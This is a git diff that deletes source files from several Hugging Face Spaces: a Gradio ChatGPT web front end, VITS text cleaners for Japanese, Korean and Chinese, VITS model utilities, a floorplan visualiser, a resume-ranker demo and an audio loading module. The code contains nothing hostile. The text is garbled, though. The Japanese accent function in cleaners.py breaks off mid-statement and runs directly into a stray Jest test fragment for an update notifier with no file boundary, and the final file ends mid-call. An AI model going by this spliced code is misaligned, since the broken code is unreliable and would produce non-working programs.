006cab5e4dc7b121990f5baec5e888f00a3a5aeb..0000000000000000000000000000000000000000 --- a/spaces/yooch/yooch/ChuanhuChatbot.py +++ /dev/null @@ -1,159 +0,0 @@ -import gradio as gr -# import openai -import os -import sys -import argparse -from utils import * -from presets import * - - -my_api_key = "" # 在这里输入你的 API 密钥 - -#if we are running in Docker -if os.environ.get('dockerrun') == 'yes': - dockerflag = True -else: - dockerflag = False - -authflag = False - -if dockerflag: - my_api_key = os.environ.get('my_api_key') - if my_api_key == "empty": - print("Please give a api key!") - sys.exit(1) - #auth - username = os.environ.get('USERNAME') - password = os.environ.get('PASSWORD') - if not (isinstance(username, type(None)) or isinstance(password, type(None))): - authflag = True -else: - if not my_api_key and os.path.exists("api_key.txt") and os.path.getsize("api_key.txt"): - with open("api_key.txt", "r") as f: - my_api_key = f.read().strip() - if os.path.exists("auth.json"): - with open("auth.json", "r") as f: - auth = json.load(f) - username = auth["username"] - password = auth["password"] - if username != "" and password != "": - authflag = True - -gr.Chatbot.postprocess = postprocess - -with gr.Blocks(css=customCSS) as demo: - gr.HTML(title) - with gr.Row(): - keyTxt = gr.Textbox(show_label=False, placeholder=f"在这里输入你的OpenAI API-key...", - value=my_api_key, type="password", visible=not HIDE_MY_KEY).style(container=True) - use_streaming_checkbox = gr.Checkbox(label="实时传输回答", value=True, visible=enable_streaming_option) - chatbot = gr.Chatbot() # .style(color_map=("#1D51EE", "#585A5B")) - history = gr.State([]) - token_count = gr.State([]) - promptTemplates = gr.State(load_template(get_template_names(plain=True)[0], mode=2)) - TRUECOMSTANT = gr.State(True) - FALSECONSTANT = gr.State(False) - topic = gr.State("未命名对话历史记录") - - with gr.Row(): - with gr.Column(scale=12): - user_input = gr.Textbox(show_label=False, placeholder="在这里输入").style( - container=False) - with gr.Column(min_width=50, scale=1): - submitBtn = gr.Button("🚀", variant="primary") - with gr.Row(): - emptyBtn = gr.Button("🧹 新的对话") - retryBtn = gr.Button("🔄 重新生成") - delLastBtn = gr.Button("🗑️ 删除最近一条对话") - reduceTokenBtn = gr.Button("♻️ 总结对话") - status_display = gr.Markdown("status: ready") - systemPromptTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入System Prompt...", - label="System prompt", value=initial_prompt).style(container=True) - with gr.Accordion(label="加载Prompt模板", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - templateFileSelectDropdown = gr.Dropdown(label="选择Prompt模板集合文件", choices=get_template_names(plain=True), multiselect=False, value=get_template_names(plain=True)[0]) - with gr.Column(scale=1): - templateRefreshBtn = gr.Button("🔄 刷新") - templaeFileReadBtn = gr.Button("📂 读入模板") - with gr.Row(): - with gr.Column(scale=6): - templateSelectDropdown = gr.Dropdown(label="从Prompt模板中加载", choices=load_template(get_template_names(plain=True)[0], mode=1), multiselect=False, value=load_template(get_template_names(plain=True)[0], mode=1)[0]) - with gr.Column(scale=1): - templateApplyBtn = gr.Button("⬇️ 应用") - with gr.Accordion(label="保存/加载对话历史记录", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - saveFileName = gr.Textbox( - show_label=True, placeholder=f"在这里输入保存的文件名...", label="设置保存文件名", value="对话历史记录").style(container=True) - with gr.Column(scale=1): - saveHistoryBtn = gr.Button("💾 保存对话") - with gr.Row(): - with gr.Column(scale=6): - historyFileSelectDropdown = gr.Dropdown(label="从列表中加载对话", choices=get_history_names(plain=True), multiselect=False, value=get_history_names(plain=True)[0]) - with gr.Column(scale=1): - historyRefreshBtn = gr.Button("🔄 刷新") - historyReadBtn = gr.Button("📂 读入对话") - #inputs, top_p, temperature, top_k, repetition_penalty - with gr.Accordion("参数", open=False): - top_p = gr.Slider(minimum=-0, maximum=1.0, value=1.0, step=0.05, - interactive=True, label="Top-p (nucleus sampling)",) - temperature = gr.Slider(minimum=-0, maximum=5.0, value=1.0, - step=0.1, interactive=True, label="Temperature",) - #top_k = gr.Slider( minimum=1, maximum=50, value=4, step=1, interactive=True, label="Top-k",) - #repetition_penalty = gr.Slider( minimum=0.1, maximum=3.0, value=1.03, step=0.01, interactive=True, label="Repetition Penalty", ) - gr.Markdown(description) - - - user_input.submit(predict, [keyTxt, systemPromptTxt, history, user_input, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - user_input.submit(reset_textbox, [], [user_input]) - - submitBtn.click(predict, [keyTxt, systemPromptTxt, history, user_input, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - submitBtn.click(reset_textbox, [], [user_input]) - - emptyBtn.click(reset_state, outputs=[chatbot, history, token_count, status_display], show_progress=True) - - retryBtn.click(retry, [keyTxt, systemPromptTxt, history, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - - delLastBtn.click(delete_last_conversation, [chatbot, history, token_count, use_streaming_checkbox], [ - chatbot, history, token_count, status_display], show_progress=True) - - reduceTokenBtn.click(reduce_token_size, [keyTxt, systemPromptTxt, history, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - - saveHistoryBtn.click(save_chat_history, [ - saveFileName, systemPromptTxt, history, chatbot], None, show_progress=True) - - saveHistoryBtn.click(get_history_names, None, [historyFileSelectDropdown]) - - historyRefreshBtn.click(get_history_names, None, [historyFileSelectDropdown]) - - historyReadBtn.click(load_chat_history, [historyFileSelectDropdown, systemPromptTxt, history, chatbot], [saveFileName, systemPromptTxt, history, chatbot], show_progress=True) - - templateRefreshBtn.click(get_template_names, None, [templateFileSelectDropdown]) - - templaeFileReadBtn.click(load_template, [templateFileSelectDropdown], [promptTemplates, templateSelectDropdown], show_progress=True) - - templateApplyBtn.click(get_template_content, [promptTemplates, templateSelectDropdown, systemPromptTxt], [systemPromptTxt], show_progress=True) - -print("yooch的温馨提示:访问 http://localhost:7860 查看界面") -# 默认开启本地服务器,默认可以直接从IP访问,默认不创建公开分享链接 -demo.title = "yoochChatGPT 🚀" - -if __name__ == "__main__": - #if running in Docker - if dockerflag: - if authflag: - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(username, password)) - else: - demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) - #if not running in Docker - else: - if authflag: - demo.queue().launch(share=False, auth=(username, password)) - else: - demo.queue().launch(share=False) # 改为 share=True 可以创建公开分享链接 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) # 可自定义端口 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=("在这里填写用户名", "在这里填写密码")) # 可设置用户名与密码 - #demo.queue().launch(auth=("在这里填写用户名", "在这里填写密码")) # 适合Nginx反向代理 diff --git a/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py b/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py deleted file mode 100644 index d26581deb399609163518054718ad80ecca5d934..0000000000000000000000000000000000000000 --- a/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py +++ /dev/null @@ -1,475 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -''' -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -''' - -import re -from unidecode import unidecode -import pyopenjtalk -from jamo import h2j, j2hcj -from pypinyin import lazy_pinyin, BOPOMOFO -import jieba, cn2an - - -# This is a list of Korean classifiers preceded by pure Korean numerals. -_korean_classifiers = '군데 권 개 그루 닢 대 두 마리 모 모금 뭇 발 발짝 방 번 벌 보루 살 수 술 시 쌈 움큼 정 짝 채 척 첩 축 켤레 톨 통' - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r'\s+') - -# Regular expression matching Japanese without punctuation marks: -_japanese_characters = re.compile(r'[A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# Regular expression matching non-Japanese characters or punctuation marks: -_japanese_marks = re.compile(r'[^A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [(re.compile('\\b%s\\.' % x[0], re.IGNORECASE), x[1]) for x in [ - ('mrs', 'misess'), - ('mr', 'mister'), - ('dr', 'doctor'), - ('st', 'saint'), - ('co', 'company'), - ('jr', 'junior'), - ('maj', 'major'), - ('gen', 'general'), - ('drs', 'doctors'), - ('rev', 'reverend'), - ('lt', 'lieutenant'), - ('hon', 'honorable'), - ('sgt', 'sergeant'), - ('capt', 'captain'), - ('esq', 'esquire'), - ('ltd', 'limited'), - ('col', 'colonel'), - ('ft', 'fort'), -]] - -# List of (hangul, hangul divided) pairs: -_hangul_divided = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('ㄳ', 'ㄱㅅ'), - ('ㄵ', 'ㄴㅈ'), - ('ㄶ', 'ㄴㅎ'), - ('ㄺ', 'ㄹㄱ'), - ('ㄻ', 'ㄹㅁ'), - ('ㄼ', 'ㄹㅂ'), - ('ㄽ', 'ㄹㅅ'), - ('ㄾ', 'ㄹㅌ'), - ('ㄿ', 'ㄹㅍ'), - ('ㅀ', 'ㄹㅎ'), - ('ㅄ', 'ㅂㅅ'), - ('ㅘ', 'ㅗㅏ'), - ('ㅙ', 'ㅗㅐ'), - ('ㅚ', 'ㅗㅣ'), - ('ㅝ', 'ㅜㅓ'), - ('ㅞ', 'ㅜㅔ'), - ('ㅟ', 'ㅜㅣ'), - ('ㅢ', 'ㅡㅣ'), - ('ㅑ', 'ㅣㅏ'), - ('ㅒ', 'ㅣㅐ'), - ('ㅕ', 'ㅣㅓ'), - ('ㅖ', 'ㅣㅔ'), - ('ㅛ', 'ㅣㅗ'), - ('ㅠ', 'ㅣㅜ') -]] - -# List of (Latin alphabet, hangul) pairs: -_latin_to_hangul = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', '에이'), - ('b', '비'), - ('c', '시'), - ('d', '디'), - ('e', '이'), - ('f', '에프'), - ('g', '지'), - ('h', '에이치'), - ('i', '아이'), - ('j', '제이'), - ('k', '케이'), - ('l', '엘'), - ('m', '엠'), - ('n', '엔'), - ('o', '오'), - ('p', '피'), - ('q', '큐'), - ('r', '아르'), - ('s', '에스'), - ('t', '티'), - ('u', '유'), - ('v', '브이'), - ('w', '더블유'), - ('x', '엑스'), - ('y', '와이'), - ('z', '제트') -]] - -# List of (Latin alphabet, bopomofo) pairs: -_latin_to_bopomofo = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', 'ㄟˉ'), - ('b', 'ㄅㄧˋ'), - ('c', 'ㄙㄧˉ'), - ('d', 'ㄉㄧˋ'), - ('e', 'ㄧˋ'), - ('f', 'ㄝˊㄈㄨˋ'), - ('g', 'ㄐㄧˋ'), - ('h', 'ㄝˇㄑㄩˋ'), - ('i', 'ㄞˋ'), - ('j', 'ㄐㄟˋ'), - ('k', 'ㄎㄟˋ'), - ('l', 'ㄝˊㄛˋ'), - ('m', 'ㄝˊㄇㄨˋ'), - ('n', 'ㄣˉ'), - ('o', 'ㄡˉ'), - ('p', 'ㄆㄧˉ'), - ('q', 'ㄎㄧㄡˉ'), - ('r', 'ㄚˋ'), - ('s', 'ㄝˊㄙˋ'), - ('t', 'ㄊㄧˋ'), - ('u', 'ㄧㄡˉ'), - ('v', 'ㄨㄧˉ'), - ('w', 'ㄉㄚˋㄅㄨˋㄌㄧㄡˋ'), - ('x', 'ㄝˉㄎㄨˋㄙˋ'), - ('y', 'ㄨㄞˋ'), - ('z', 'ㄗㄟˋ') -]] - - -# List of (bopomofo, romaji) pairs: -_bopomofo_to_romaji = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('ㄅㄛ', 'p⁼wo'), - ('ㄆㄛ', 'pʰwo'), - ('ㄇㄛ', 'mwo'), - ('ㄈㄛ', 'fwo'), - ('ㄅ', 'p⁼'), - ('ㄆ', 'pʰ'), - ('ㄇ', 'm'), - ('ㄈ', 'f'), - ('ㄉ', 't⁼'), - ('ㄊ', 'tʰ'), - ('ㄋ', 'n'), - ('ㄌ', 'l'), - ('ㄍ', 'k⁼'), - ('ㄎ', 'kʰ'), - ('ㄏ', 'h'), - ('ㄐ', 'ʧ⁼'), - ('ㄑ', 'ʧʰ'), - ('ㄒ', 'ʃ'), - ('ㄓ', 'ʦ`⁼'), - ('ㄔ', 'ʦ`ʰ'), - ('ㄕ', 's`'), - ('ㄖ', 'ɹ`'), - ('ㄗ', 'ʦ⁼'), - ('ㄘ', 'ʦʰ'), - ('ㄙ', 's'), - ('ㄚ', 'a'), - ('ㄛ', 'o'), - ('ㄜ', 'ə'), - ('ㄝ', 'e'), - ('ㄞ', 'ai'), - ('ㄟ', 'ei'), - ('ㄠ', 'au'), - ('ㄡ', 'ou'), - ('ㄧㄢ', 'yeNN'), - ('ㄢ', 'aNN'), - ('ㄧㄣ', 'iNN'), - ('ㄣ', 'əNN'), - ('ㄤ', 'aNg'), - ('ㄧㄥ', 'iNg'), - ('ㄨㄥ', 'uNg'), - ('ㄩㄥ', 'yuNg'), - ('ㄥ', 'əNg'), - ('ㄦ', 'əɻ'), - ('ㄧ', 'i'), - ('ㄨ', 'u'), - ('ㄩ', 'ɥ'), - ('ˉ', '→'), - ('ˊ', '↑'), - ('ˇ', '↓↑'), - ('ˋ', '↓'), - ('˙', ''), - (',', ','), - ('。', '.'), - ('!', '!'), - ('?', '?'), - ('—', '-') -]] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, ' ', text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def japanese_to_romaji_with_accent(text): - '''Reference https://r9y9.github.io/ttslearn/latest/notebooks/ch10_Recipe-Tacotron.html''' - sentences = re.split(_japanese_marks, text) - marks = re.findall(_japanese_marks, text) - text = '' - for i, sentence in enumerate(sentences): - if re.match(_japanese_characters, sentence): - if text!='': - text+=' ' - labels = pyopenjtalk.extract_fullcontext(sentence) - for n, label in enumerate(labels): - phoneme = re.search(r'\-([^\+]*)\+', label).group(1) - if phoneme not in ['sil','pau']: - text += phoneme.replace('ch','ʧ').replace('sh','ʃ').replace('cl','Q') - else: - continue - n_moras = int(re.search(r'/F:(\d+)_', label).group(1)) - a1 = int(re.search(r"/A:(\-?[0-9]+)\+", label).group(1)) - a2 = int(re.search(r"\+(\d+)\+", label).group(1)) - a3 = int(re.search(r"\+(\d+)/", label).group(1)) - if re.search(r'\-([^\+]*)\+', labels[n + 1]).group(1) in ['sil','pau']: - a2_next=-1 - else: - a2_next = int(re.search(r"\+(\d+)\+", labels[n + 1]).group(1)) - # Accent phrase boundary - if a3 == 1 and a2_next == 1: - text += ' ' - # Falling - elif a1 == 0 and a2_next == a2 + 1 and a2 != n_moras: - text += '↓' - # Rising - elif a2 == 1 and a2_next == 2: - text += '↑' - if i jest.fn().mockResolvedValue('2.0.0')); - -beforeEach(jest.clearAllMocks); - -test('it logs message if update is available', async () => { - await simpleUpdateNotifier({ - pkg: { name: 'test', version: '1.0.0' }, - alwaysRun: true, - }); - - expect(consoleSpy).toHaveBeenCalledTimes(1); -}); - -test('it does not log message if update is not available', async () => { - (hasNewVersion as jest.Mock).mockResolvedValue(false); - await simpleUpdateNotifier({ - pkg: { name: 'test', version: '2.0.0' }, - alwaysRun: true, - }); - - expect(consoleSpy).toHaveBeenCalledTimes(0); -}); diff --git a/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py b/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py deleted file mode 100644 index 84f772d9e907a1a93e13e385ad20d2dc9141022d..0000000000000000000000000000000000000000 --- a/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py +++ /dev/null @@ -1,147 +0,0 @@ -""" -@date: 2021/6/29 -@description: -""" -import cv2 - - -import matplotlib.pyplot as plt - -from PIL import Image -from utils.boundary import * - - -def draw_floorplan(xz, fill_color=None, border_color=None, side_l=512, show_radius=None, show=False, marker_color=None, - center_color=None, scale=1.5): - """ - :param scale: - :param center_color: - :param marker_color: for corners marking - :param fill_color: - :param border_color: boundary color - :param xz: [[x1, z1], [x2, z2], ....] - :param side_l: side length (pixel) of the output result - :param show_radius: The displayed maximum radius m (proportional to the projection plane plan_y of xz), - such as set to 1, means that the pixel value of side_l/2 is expressed as 1m, if not set this value to display all - :param show: - :return: - """ - if fill_color is None: - fill_color = [1] - - board = np.zeros([side_l, side_l, len(fill_color)], dtype=np.float32) - - if show_radius is None: - show_radius = np.linalg.norm(xz, axis=-1).max() - - xz = xz * side_l / (2*scale) / show_radius - # v<-----------|o - # | | | - # | ----|----z | - # | | | - # | x \|/ - # |------------u - xz[:, 1] = -xz[:, 1] - xz += side_l // 2 # moving to center - xz = xz.astype(np.int32) - cv2.fillPoly(board, [xz], fill_color) - if border_color: - cv2.drawContours(board, [xz], 0, border_color, 2) - - if marker_color is not None: - for p in xz: - cv2.drawMarker(board, tuple(p), marker_color, markerType=0, markerSize=10, thickness=2) - if center_color is not None: - cv2.drawMarker(board, tuple([side_l // 2, side_l // 2]), center_color, markerType=0, markerSize=10, thickness=2) - - if show: - # plt.rcParams['figure.dpi'] = 300 - plt.axis('off') - plt.imshow(board[..., 0] if board.shape[-1] == 1 else board) - plt.show() - - return board - - -def draw_iou_floorplan(dt_xz, gt_xz, show_radius=None, show=False, side_l=512, - iou_2d=None, iou_3d=None, dt_board_color=None, gt_board_color=None): - """ - :param gt_board_color: - :param dt_board_color: - :param dt_xz: [[x1, z1], [x2, z2], ....] - :param gt_xz: [[x1, z1], [x2, z2], ....] - :param show: - :param side_l: side length (pixel) of the output result - :param show_radius: The displayed maximum radius m (proportional to the projection plane plan_y of xz), - such as set to 1, means that the pixel value of side_l/2 is expressed as 1m, if not set this value to display all - :param iou_2d: - :param iou_3d: - :return: - """ - if dt_board_color is None: - dt_board_color = [0, 1, 0, 1] - if gt_board_color is None: - gt_board_color = [0, 0, 1, 1] - center_color = [1, 0, 0, 1] - fill_color = [0.2, 0.2, 0.2, 0.2] - - if show_radius is None: - # niform scale - gt_radius = np.linalg.norm(gt_xz, axis=-1).max() - dt_radius = np.linalg.norm(dt_xz, axis=-1).max() - show_radius = gt_radius if gt_radius > dt_radius else dt_radius - - dt_floorplan = draw_floorplan(dt_xz, show_radius=show_radius, fill_color=fill_color, - border_color=dt_board_color, side_l=side_l, show=False) - gt_floorplan = draw_floorplan(gt_xz, show_radius=show_radius, fill_color=fill_color, - border_color=gt_board_color, side_l=side_l, show=False, - center_color=[1, 0, 0, 1]) - - dt_floorplan = Image.fromarray((dt_floorplan * 255).astype(np.uint8), mode='RGBA') - gt_floorplan = Image.fromarray((gt_floorplan * 255).astype(np.uint8), mode='RGBA') - iou_floorplan = Image.alpha_composite(gt_floorplan, dt_floorplan) - - back = np.zeros([side_l, side_l, len(fill_color)], dtype=np.float32) - back[..., :] = [0.8, 0.8, 0.8, 1] - back = Image.fromarray((back * 255).astype(np.uint8), mode='RGBA') - - iou_floorplan = Image.alpha_composite(back, iou_floorplan).convert("RGB") - iou_floorplan = np.array(iou_floorplan) / 255.0 - - if iou_2d is not None: - cv2.putText(iou_floorplan, f'2d:{iou_2d * 100:.2f}', (10, 30), 2, 1, (0, 0, 0), 1) - if iou_3d is not None: - cv2.putText(iou_floorplan, f'3d:{iou_3d * 100:.2f}', (10, 60), 2, 1, (0, 0, 0), 1) - - if show: - plt.axis('off') - plt.imshow(iou_floorplan) - plt.show() - return iou_floorplan - - -if __name__ == '__main__': - import numpy as np - from dataset.mp3d_dataset import MP3DDataset - from utils.boundary import depth2boundaries - from utils.conversion import uv2xyz - from visualization.boundary import draw_boundaries - - mp3d_dataset = MP3DDataset(root_dir='../src/dataset/mp3d', mode='train') - gt = mp3d_dataset.__getitem__(0) - - # boundary_list = depth2boundaries(gt['ratio'], gt['depth'], step=None) - # pano_img = draw_boundaries(gt['image'].transpose(1, 2, 0), boundary_list=boundary_list, show=True) - # draw_floorplan(uv2xyz(boundary_list[0])[..., ::2], show=True, marker_color=None, center_color=0.8) - # draw_floorplan(depth2xyz(gt['depth'])[..., ::2], show=True, marker_color=None, center_color=0.8) - - corners = gt['corners'][gt['corners'][..., 0] + gt['corners'][..., 1] != 0] - dt_corners = corners + 0.1 - # img = draw_floorplan(uv2xyz(corners)[..., ::2], show=True, fill_color=[0.8, 0.8, 0.8, 0.2], - # marker_color=None, center_color=[1, 0, 0, 1], border_color=[0, 0, 1, 1]) - # cv2.imwrite('../src/fig/flp.png', (img*255).astype(np.uint8)) - - img = draw_iou_floorplan(uv2xyz(dt_corners)[..., ::2], uv2xyz(corners)[..., ::2], side_l=512, show=True) - img[..., 0:3] = img[..., 0:3][..., ::-1] - # cv2.imwrite('../src/fig/flp.png', (img*255).astype(np.uint8)) - diff --git a/spaces/zhoucr/ai-koni/commons.py b/spaces/zhoucr/ai-koni/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/zhoucr/ai-koni/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/zhuolisam/resume-ranker/demo.py b/spaces/zhuolisam/resume-ranker/demo.py deleted file mode 100644 index 6ca61d2a6e97290eb8742b0d2c096d66a9dd6396..0000000000000000000000000000000000000000 --- a/spaces/zhuolisam/resume-ranker/demo.py +++ /dev/null @@ -1,26 +0,0 @@ -from pdf_loader import load_documents -from core import pipeline - -if __name__ == '__main__': - pipeline('''About Sleek - -Sleek is on a mission to revolutionize how entrepreneurs operate their business. We want to give small business owners peace of mind and the power of online solutions to allow them to focus on what they do best - growing their business. As we work for our thousands of customers, we gather millions of data points about their business, and in turn we transform those into useful, actionable insights and recommendations to accelerate their growth through smart algorithms. - -We are a team of 400 builders from 17 countries, with offices in Singapore, Philippines, Hong Kong, Australia and the UK committed to delivering a delightful experience to our clients! - -You will be working in the Data & Analytics organization to solve a wide range of business problems leveraging advanced analytics. You will deploy a flexible analytical skill set to deliver insightful data and analysis and model business scenarios. Your principal goal will be to use data to drive better business decisions. This means translating data into meaningful insights and recommendations and, where relevant, proactively implement improvements. You will be developing the business reporting and analysis for our internal operations world-wide. The job will require working closely with the various Business Units to understand their business question as well as the whole data team to understand and access available data. - -Position Duties -Drive analytical problem-solving and deep dives. Work with large, complex data sets. Solve difficult, non-routine problems, applying advanced quantitative methods. -Collaborate with a wide variety of cross-functional partners to determine business needs, drive analytical projects from start to finish. -Align with involved stakeholders to set up dashboards and reports to drive data driven decision across all departments -Working very closely with our Data team, Tech and Product team to understand the business logic to generate accurate reports and correct analysis - -Requirements - -Performance Standards -Able to commit for a period of at least 4 months -Currently pursuing a degree in Business Science, Engineering or relevant disciplines with a focus on data. -Good knowledge in SQL, R and Python. -Experience in data visualization tools (Tableau, PowerBI, Google DataStudio or equivalent) will be an added advantage.''', - load_documents(source_dir = 'documents')) diff --git a/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py b/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py deleted file mode 100644 index 88597d62a505715091f9ba62d38bf0a85a31b95a..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py +++ /dev/null @@ -1,111 +0,0 @@ -import math -import os -os.environ["LRU_CACHE_CAPACITY"] = "3" -import random -import torch -import torch.utils.data -import numpy as np -import librosa -from librosa.util import normalize -from librosa.filters import mel as librosa_mel_fn -from scipy.io.wavfile import read -import soundfile as sf - -def load_wav_to_torch(full_path, target_sr=None, return_empty_on_exception=False): - sampling_rate = None - try: - data, sampling_rate = sf.read(full_path, always_2d=True)# than soundfile. - except Exception as ex: - print(f"'{full_path}' failed to load.\nException:") - print(ex) - if return_empty_on_exception: - return [], sampling_rate or target_sr or 32000 - else: - raise Exception(ex) - - if len(data.shape) > 1: - data = data[:, 0] - assert len(data) > 2# check duration of audio file is > 2 samples (because otherwise the slice operation was on the wrong dimension) - - if np.issubdtype(data.dtype, np.integer): # if audio data is type int - max_mag = -np.iinfo(data.dtype).min # maximum magnitude = min possible value of intXX - else: # if audio data is type fp32 - max_mag = max(np.amax(data), -np.amin(data)) - max_mag = (2**31)+1 if max_mag > (2**15) else ((2**15)+1 if max_mag > 1.01 else 1.0) # data should be either 16-bit INT, 32-bit INT or [-1 to 1] float32 - - data = torch.FloatTensor(data.astype(np.float32))/max_mag - - if (torch.isinf(data) | torch.isnan(data)).any() and return_empty_on_exception:# resample will crash with inf/NaN inputs. return_empty_on_exception will return empty arr instead of except - return [], sampling_rate or target_sr or 32000 - if target_sr is not None and sampling_rate != target_sr: - data = torch.from_numpy(librosa.core.resample(data.numpy(), 